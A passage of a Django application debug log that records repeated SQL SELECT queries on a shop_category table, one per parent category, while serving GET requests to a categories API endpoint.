"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:53:46,851 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:53:46,854 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:53:46,857 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:53:46,860 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:53:46,865 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:53:46,868 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:53:46,870 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:53:46,873 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:53:46,875 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:53:46,879 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:53:46,881 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:53:46,883 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:53:46,886 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:53:46,890 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:53:46,895 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:53:46,897 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:53:46,900 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:53:46,903 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:53:46,905 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:53:46,907 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:53:46,911 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:53:46,915 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:53:46,917 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:53:46,921 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:53:46,923 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:53:46] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:56:06,902 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:56:06,909 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:56:06,913 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:56:06,915 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:56:06,918 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:56:06,921 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:56:06,923 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:56:06,925 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:56:06,927 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:56:06,931 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:56:06,933 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:56:06,936 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:56:06,938 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:56:06,941 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:56:06,944 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:56:06,946 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:56:06,949 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:56:06,951 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:56:06,953 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:56:06,957 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:56:06,961 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:56:06,964 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:56:06,967 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:56:06,969 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:56:06,976 utils 4252 140031492613888 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:56:06,980 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:56:06,983 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:56:06,985 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:56:06,988 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 8; args=(8,) DEBUG 2019-12-19 13:56:06,988 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:56:06,994 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:56:06,997 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:56:07,001 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) [19/Dec/2019 13:56:07] "GET /api/v1/categories/8 HTTP/1.0" 200 944 DEBUG 2019-12-19 13:56:07,004 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:56:07,007 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:56:07,009 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:56:07,011 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:56:07,015 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:56:07,017 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:56:07,020 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:56:07,022 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:56:07,024 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 